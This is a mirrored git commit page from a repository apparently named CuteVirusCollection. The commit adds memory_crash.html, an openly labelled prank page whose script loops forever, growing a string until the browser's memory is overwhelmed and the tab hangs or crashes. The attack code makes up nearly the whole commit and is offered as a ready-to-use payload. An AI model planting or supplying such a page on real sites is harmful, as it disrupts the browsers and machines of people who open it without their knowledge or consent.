mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
Creates a super big string and overwhelms the RAM.
This commit is contained in:
9
memory_crash.html
Normal file
9
memory_crash.html
Normal file
@@ -0,0 +1,9 @@
|
||||
<!-- Intro- Creates a super big string and overwhelms the RAM. -->
|
||||
<!-- Details- http://stackoverflow.com/questions/10965987/how-do-you-force-chrome-pages-tabs-to-crash-using-javascript -->
|
||||
|
||||
<script>
|
||||
var txt = "a";
|
||||
while(1){
|
||||
txt += "a";
|
||||
}
|
||||
</script>
|
||||
Reference in New Issue
Block a user